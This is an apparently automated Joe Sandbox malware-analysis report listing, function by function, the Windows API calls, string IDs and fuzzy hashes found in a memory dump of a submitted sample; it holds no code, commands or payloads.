                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                      • API String ID: 2358735015-567219261
                                                                                                                                                                                                                                      • Opcode ID: 27a90da1ccac6c53105ca5daffe3c6543aeb5d69eebd80f5fe28f8e18ad3f8da
                                                                                                                                                                                                                                      • Instruction ID: 11e3f07e31b488cf4e74644ec52236b2bee49e69327a832350bb1a1da8304a48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27a90da1ccac6c53105ca5daffe3c6543aeb5d69eebd80f5fe28f8e18ad3f8da
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5510771A0415B9BCF10DF69C9508BDB7E5BF24358B20622AE82AF7386DB31DD45C790
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00EEB6FC
                                                                                                                                                                                                                                      • GetProcessId.KERNEL32(00000000), ref: 00EEB791
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00EEB7C0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseExecuteHandleProcessShell
                                                                                                                                                                                                                                      • String ID: <$@
                                                                                                                                                                                                                                      • API String ID: 1279613386-1426351568
                                                                                                                                                                                                                                      • Opcode ID: 13ebac74508f2712f43e2aa6c93ee7284b43bf0bab502d604c84b9d693e0b87e
                                                                                                                                                                                                                                      • Instruction ID: 8e2f6c032b9a42dc34ecc8a6f477ae81f8b0f0be6f38eb1fd30f3e92339bc154
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13ebac74508f2712f43e2aa6c93ee7284b43bf0bab502d604c84b9d693e0b87e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3715635A00259DFCB14DFA5D484A9EBBF0EF08314F049499E856BB7A2CB74ED45CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00ECBCB2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                                                                                                      • API String ID: 3964851224-769500911
                                                                                                                                                                                                                                      • Opcode ID: a036c85df18cee98358718117c13850d604850f2b5980cf0fce4c97aabc5589a
                                                                                                                                                                                                                                      • Instruction ID: b8a0726cf9bb76d92011d5f4f549f91d9f460ab83f16c882dde9f57dbd9644ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a036c85df18cee98358718117c13850d604850f2b5980cf0fce4c97aabc5589a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C541B732A041279ACB105E7DC952FBE7BA5AF61768F24612DE426E7284E732CD82C750
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00EC78A4
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00EC78DA
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00EC78EB
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EC796D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                      • String ID: DllGetClassObject
                                                                                                                                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                      • Opcode ID: f483e8456b9844c32768245a554a885fbb95a8993cc5f7e3912a4252c8815aec
                                                                                                                                                                                                                                      • Instruction ID: 9aed0c8d1be3cd735299b6fd47e7de2599c9e94f8935d4a856bfadb1583af42d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f483e8456b9844c32768245a554a885fbb95a8993cc5f7e3912a4252c8815aec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE419EB1608204EFDB05CF14CD84FAA7BB9EF85314F1190ADA989AF205D7B2D945CFA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF469A
                                                                                                                                                                                                                                      • IsMenu.USER32(?), ref: 00EF46AF
                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF46F7
                                                                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 00EF470A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 6505f72227e6eb6e9c58d759bd8b24e7f798dd8a92aea59a4a5378f4740ac904
                                                                                                                                                                                                                                      • Instruction ID: 001010af4b0383d09d6028daffa3301c388080dbd1279a410a07a66be179b325
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6505f72227e6eb6e9c58d759bd8b24e7f798dd8a92aea59a4a5378f4740ac904
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0413AB5A0120DEFDF10DF55D884AEABBB5FF46318F04512AEA05AB290D730AD54DF60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC4337: GetClassNameW.USER32(?,?,000000FF), ref: 00EC435A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EC24F0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EC2503
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EC2533
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$ClassName
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 787153527-1403004172
                                                                                                                                                                                                                                      • Opcode ID: c3d71a2dc730cbd661611418ab834cc45c6acc8697fe1c29e3bd9791f525f3a9
                                                                                                                                                                                                                                      • Instruction ID: 6e2a09ab8bfebf6426cba19bda1e48a0e193a294617a9a2f5759e95f12ede3f1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3d71a2dc730cbd661611418ab834cc45c6acc8697fe1c29e3bd9791f525f3a9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 572137B1A40108BEDB04AB64DC55EFFBBA8DF81354F00611EF921B72E1DB35490B9620
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EF37F2
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00EF37F9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EF380E
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00EF3816
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                      • String ID: SysAnimate32
                                                                                                                                                                                                                                      • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                      • Opcode ID: f996d34cee25bcfaf93aca004044a89cca262ba02e0411caa35dfa52c827885a
                                                                                                                                                                                                                                      • Instruction ID: b3623dc8e03260cde512902e28ed29352c3bae307fa5b523b99de62c578a8e18
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f996d34cee25bcfaf93aca004044a89cca262ba02e0411caa35dfa52c827885a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7721A1B1600249AFEF106F74DC44EBB77A9EB587A8F209229FA10A61D1D735CD419760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E84F9E,00000003,?,00E84F3E,00000003,00F298C8,0000000C,00E85095,00000003,00000002), ref: 00E8500D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E85020
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00E84F9E,00000003,?,00E84F3E,00000003,00F298C8,0000000C,00E85095,00000003,00000002,00000000), ref: 00E85043
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                      • Opcode ID: a87f5d14862450f4ea294b6a20a5ba94b8e277d6430104a94d42da81f342facf
                                                                                                                                                                                                                                      • Instruction ID: ae0efd99bf59793134ac394b51c6217b7573370e187ce521c31542987d21268a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a87f5d14862450f4ea294b6a20a5ba94b8e277d6430104a94d42da81f342facf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39F04431505208BFDB15AF95DC49BAD7FB6EF44755F000064F80DB21A0DB309D45DB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E65303,?,?,00E6502E,?,00000001,?,?,00000000), ref: 00E652C2
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E652D4
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00E65303,?,?,00E6502E,?,00000001,?,?,00000000), ref: 00E652E6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                      • Opcode ID: 38098f2cf8c6e48969453a42e12184be755fa1b3155f5e417c9a8750c424a4c7
                                                                                                                                                                                                                                      • Instruction ID: dde6b8db43053ae0c7a60761bb59f916c83b0ea6632ee18f372c16f1e5ac233d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38098f2cf8c6e48969453a42e12184be755fa1b3155f5e417c9a8750c424a4c7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59E0CD33747A321B921127167C1877F6D399FC1F56B150015F904F2110DB90CC05C4E5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00EA448E,?,?,00E6502E,?,00000001,?,?,00000000), ref: 00E65288
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E6529A
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00EA448E,?,?,00E6502E,?,00000001,?,?,00000000), ref: 00E652AD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                      • Opcode ID: 3e76ee10ca619c3566c9f69f95dad857fc5d4c5f5a5e83c18b88ecc499f8a133
                                                                                                                                                                                                                                      • Instruction ID: 3b2845493712cf3dde1e4668036532cb93613df02c9630fa816c3f3c095d65be
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e76ee10ca619c3566c9f69f95dad857fc5d4c5f5a5e83c18b88ecc499f8a133
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4D01232A47A325B82222726BC199EE6E2AAFC1B563051125BD00B2124DF60CD05C595
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED33CF
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00ED3451
                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ED3467
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED3478
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED348A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Delete$Copy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3226157194-0
                                                                                                                                                                                                                                      • Opcode ID: c20dcf560ca201f5d26d676c4ac66575278eb8aad48c711ed577431ea3770433
                                                                                                                                                                                                                                      • Instruction ID: 8ffd453d132b77dcb831a9470264110af61ef2e7d003c64611083e05bf1c2a38
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c20dcf560ca201f5d26d676c4ac66575278eb8aad48c711ed577431ea3770433
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38B18072E01118ABDF11EBA4CC85EDFBBBDEF48350F0050AAF509F6251EA349B458B61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00EE2619
                                                                                                                                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EE263A
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00EE264B
                                                                                                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 00EE26E5
                                                                                                                                                                                                                                        • Part of subcall function 00EE3A7D: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00EDF465), ref: 00EE3A99
                                                                                                                                                                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00EE2734
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3163710072-0
                                                                                                                                                                                                                                      • Opcode ID: a84e0fd65a61c103bc3c151472e6cefaab0f7659151c34d52a110a2028b294f1
                                                                                                                                                                                                                                      • Instruction ID: 55dd9a298d28ed4d0fbd13c84057864f29b4862c6dd66807b781136cce09d729
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a84e0fd65a61c103bc3c151472e6cefaab0f7659151c34d52a110a2028b294f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAB12631604384AFC324DF25C895F2A7BE9AF84318F54A54CF55A6B2E2CB31ED45CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00EA1A7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00EA184E
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00EA1A7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00EA18D1
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00EA1A7B,?,00EA1A7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00EA1964
